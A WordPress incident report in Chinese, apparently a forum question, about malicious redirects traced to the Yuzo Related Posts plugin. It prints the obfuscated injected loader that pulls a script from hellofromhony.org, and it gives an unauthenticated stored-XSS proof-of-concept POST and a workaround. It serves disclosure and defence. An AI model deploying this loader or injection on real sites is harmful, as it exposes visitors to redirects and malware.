大约一小时前,我管理的Wordpress页面开始重定向到广告/恶意软件页面。
我找到了重定向的来源,希望为受影响的其他人提供帮助,并需要帮助查找实际的漏洞和/或修复。
在网站加载完成后发生重定向,因此我在页面中寻找JavaScript代码段并在网络分析器中查找可疑的重定向。明显的恶意重定向是:hellofromhony.org,thebiggestfavoritemake.com,nnatrevaleur.tk和一个试图抢夺我当前位置的网站(虽然不能再复制那个)。
我能够跟踪重定向到https://hellofromhony.org/counter,它是通过代码片段嵌入的。
该片段嵌入到wp_options中的一个条目中,其中包含键'yuzo_related_post_options' - 更具体地嵌入在option_value的json选项'yuzo_related_post_css_and_style'中。该选项在没有消毒的情况下得到回应。
此选项是Yuzo相关帖子插件的一部分,该插件大约一周前停止使用:https://wordpress.org/plugins/yuzo-related-post/
删除该插件立即停止了重定向,我无法找到其他篡改网站的痕迹。
option_value中的代码段:
</style><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 100, 100, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 100, 100, 41, 59, 32, 118, 97, 114, 32, 104, 104, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 57, 55, 44, 32, 49, 48, 48, 41, 59, 118, 97, 114, 32, 122, 122, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 48, 54, 44, 32, 57, 55, 44, 32, 49, 49, 56, 44, 32, 57, 55, 44, 32, 49, 49, 53, 44, 32, 57, 57, 44, 32, 49, 49, 52, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 54, 41, 59, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 122, 122, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 52, 44, 32, 49, 48, 49, 44, 32, 49, 48, 56, 44, 32, 49, 48, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 50, 44, 32, 49, 49, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 52, 54, 44, 32, 49, 49, 49, 44, 32, 49, 49, 52, 44, 32, 49, 48, 51, 44, 32, 52, 55, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 49, 55, 44, 32, 49, 49, 48, 44, 32, 49, 49, 54, 44, 32, 49, 48, 49, 44, 32, 49, 49, 52, 41, 59, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 104, 104, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59));</script>
虽然删除插件提出了一个quickfix,我想深入了解,以确保无法访问数据库,后端和网站空间。
我相信我刚刚发现它:Yuzo相关帖子插件在保存选项时不会检查身份验证。
所以POSTing
yuzo_related_post_css_and_style=</style><script+language=javascript>alert('hacked');</script>
即使你没有登录,/wp-admin/options-general.php?page=yuzo-related-post也会成功。
插件使用is_admin()来检查身份验证,但这是一个“假朋友”并且仅检查所访问的页面是否在管理区域中,而不是用户是否经过身份验证(未经授权)。见Wordpress documentation。
继续使用插件的快速解决方案是通过在/assets/functions/options.php第1155行的if语句中添加false来删除settings选项:
function __construct(){
global $if_utils;
$this->utils = $if_utils;
if(false/* is_admin() */)
self::configuration_plugin();
else
self::parameters();
}
更新:
Hang Guan指向a Blog Post about this issue from last week,现在看起来像是“在野外”。